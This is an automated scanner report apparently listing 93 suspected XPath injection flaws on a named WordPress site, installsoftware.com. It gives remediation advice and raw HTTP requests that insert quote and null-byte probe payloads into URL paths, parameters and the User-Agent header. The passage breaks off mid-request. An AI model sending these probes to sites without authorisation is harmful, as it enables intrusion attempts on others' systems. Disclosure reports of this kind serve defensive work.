XPath Injection, Various Hosts, Vulnerability Report

XPATH Injection DORK | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Feb 05 07:27:36 CST 2011.




1. XPath injection

1.1. http://www.installsoftware.com/favicon.ico [REST URL parameter 1]

1.2. http://www.installsoftware.com/favicon.ico [name of an arbitrarily supplied request parameter]

1.3. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

1.4. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

1.5. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

1.6. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [User-Agent HTTP header]

1.7. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [name of an arbitrarily supplied request parameter]

1.8. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [ver parameter]

1.9. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1]

1.10. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2]

1.11. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3]

1.12. http://www.installsoftware.com/wp-admin/css/login.css [User-Agent HTTP header]

1.13. http://www.installsoftware.com/wp-admin/css/login.css [name of an arbitrarily supplied request parameter]

1.14. http://www.installsoftware.com/wp-admin/css/login.css [ver parameter]

1.15. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1]

1.16. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2]

1.17. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3]

1.18. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4]

1.19. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5]

1.20. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [User-Agent HTTP header]

1.21. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]

1.22. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1]

1.23. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2]

1.24. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3]

1.25. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 4]

1.26. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 5]

1.27. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [User-Agent HTTP header]

1.28. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [name of an arbitrarily supplied request parameter]

1.29. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 1]

1.30. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 2]

1.31. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 3]

1.32. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 4]

1.33. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [REST URL parameter 5]

1.34. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [User-Agent HTTP header]

1.35. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/template.css [name of an arbitrarily supplied request parameter]

1.36. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 1]

1.37. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 2]

1.38. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 3]

1.39. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 4]

1.40. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [REST URL parameter 5]

1.41. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [User-Agent HTTP header]

1.42. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/typography.css [name of an arbitrarily supplied request parameter]

1.43. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 1]

1.44. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 2]

1.45. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 3]

1.46. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 4]

1.47. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [REST URL parameter 5]

1.48. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [User-Agent HTTP header]

1.49. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/wp.css [name of an arbitrarily supplied request parameter]

1.50. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 1]

1.51. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 2]

1.52. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 3]

1.53. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 4]

1.54. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [REST URL parameter 5]

1.55. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [User-Agent HTTP header]

1.56. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/mootools.bgiframe.js [name of an arbitrarily supplied request parameter]

1.57. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1]

1.58. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2]

1.59. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3]

1.60. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4]

1.61. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5]

1.62. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6]

1.63. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7]

1.64. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8]

1.65. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [User-Agent HTTP header]

1.66. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]

1.67. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1]

1.68. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 2]

1.69. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 3]

1.70. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 4]

1.71. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 5]

1.72. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 6]

1.73. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 7]

1.74. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 8]

1.75. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [User-Agent HTTP header]

1.76. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [name of an arbitrarily supplied request parameter]

1.77. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 1]

1.78. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 2]

1.79. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 3]

1.80. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 4]

1.81. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [REST URL parameter 5]

1.82. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [User-Agent HTTP header]

1.83. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokmoomenu.js [name of an arbitrarily supplied request parameter]

1.84. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 1]

1.85. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 2]

1.86. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 3]

1.87. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 4]

1.88. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [REST URL parameter 5]

1.89. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [User-Agent HTTP header]

1.90. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokutils.js [name of an arbitrarily supplied request parameter]

1.91. http://www.installsoftware.com/xmlrpc.php [REST URL parameter 1]

1.92. http://www.installsoftware.com/xmlrpc.php [User-Agent HTTP header]

1.93. http://www.installsoftware.com/xmlrpc.php [name of an arbitrarily supplied request parameter]



1. XPath injection
There are 93 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


1.1. http://www.installsoftware.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.2. http://www.installsoftware.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /favicon.ico?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:34 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44274

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.3. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin'/css/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.4. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css'/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.5. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css' HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:16:08 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:16:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.6. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:04 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.7. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:14:53 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.8. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [ver parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The ver parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the ver parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/colors-fresh.css?ver=20100610%00' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/wp-login.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.9. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin'/css/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.10. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css'/login.css HTTP/1.1
